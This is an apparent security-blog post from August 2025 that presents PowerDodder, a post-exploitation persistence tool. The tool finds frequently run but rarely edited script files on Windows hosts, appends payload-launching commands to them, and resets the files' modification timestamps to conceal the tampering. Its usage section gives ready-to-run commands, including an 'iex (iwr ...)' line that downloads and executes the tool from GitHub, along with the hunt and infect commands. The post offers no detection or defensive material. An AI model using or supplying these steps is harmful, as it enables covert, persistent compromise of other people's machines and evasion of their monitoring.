PowerDodder: The Stealthy New Tool That Hides Malware in Your Script Files

by ddos · August 25, 2025

PowerDodder is a post-exploitation persistence utility designed to stealthily embed execution commands into existing script files on the host. By leveraging files that are frequently accessed but rarely modified, it targets high-likelihood execution vectors with minimal detection risk.

Background

Traditional persistence methods (e.g., Registry Run keys, scheduled tasks) are often monitored or flagged by EDRs and blue teams. PowerDodder takes a novel approach:

It hunts for existing script files on disk (.ps1, .bat,.cmd, .vbs, .js).
It prioritizes those that:
- Have been accessed recently (indicating they’re being executed often).
- Haven’t been modified recently (suggesting they’re not actively edited).
It lets you choose the target script(s), and then it appends a payload-spawning command using a context-appropriate syntax (PowerShell, VBScript, JScript, etc.).

This allows for low-noise persistence, hitching a ride on legitimate execution paths.

Name Origin

The name Dodder comes from a parasitic vine that attaches itself to host plants, slowly feeding off them without killing them — much like this tool latches onto host scripts for persistent execution.

Usage

1. Load the script

[pastacode lang=”bash” manual=”iex%20(iwr%20https%3A%2F%2Fraw.githubusercontent.com%2Fitaymigdal%2FPowerDodder%2Frefs%2Fheads%2Fmain%2FPowerDodder.ps1)” message=”” highlight=”” provider=”manual”/]

2. Run a Hunt

Scans predefined folders (C:\Users\, C:\Program Files\, C:\Program Files (x86)\, C:\ProgramData\) for promising script files.

[pastacode lang=”bash” manual=”DodderHunt” message=”” highlight=”” provider=”manual”/]

You can also target a specific folder:

[pastacode lang=”bash” manual=”DodderHunt%20-FolderPath%20%22C%3A%5CCustomPath%22″ message=”” highlight=”” provider=”manual”/]

Optional params:

-LastAccessTimeThreshold: default is 7 days.

-LastModifyTimeThreshold: default is 3 months.

You can set different thresholds like that:

[pastacode lang=”bash” manual=”%24DifferentModifyThreshold%20%3D%20(get-date).AddMonths(-4)%20%24DifferentAccessThreshold%20%3D%20(get-date).AddDays(-20)%20DodderHunt%20-LastAccessTimeThreshold%20%24DifferentAccessThreshold%20-LastModifyTimeThreshold%20%24DifferentModifyThreshold” message=”” highlight=”” provider=”manual”/]

3. Infect a script

[pastacode lang=”bash” manual=”DodderInfect%20-ID%20%3CCandidateID%3E%20-PersistCommand%20%3CExecutionCommand%3E” message=”” highlight=”” provider=”manual”/]

This will:

Create the appended line of your command based on the relevant template.
Modify the file by appending the persistence command.
Restore the original script LastWriteTime attribute to hide the modification.
Move the infected script to the Infected list.

4. Helpers

DodderShow: Lists found candidates and already-infected files.
DodderClearCandidates: Empties the current candidates list (useful before rescanning).

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal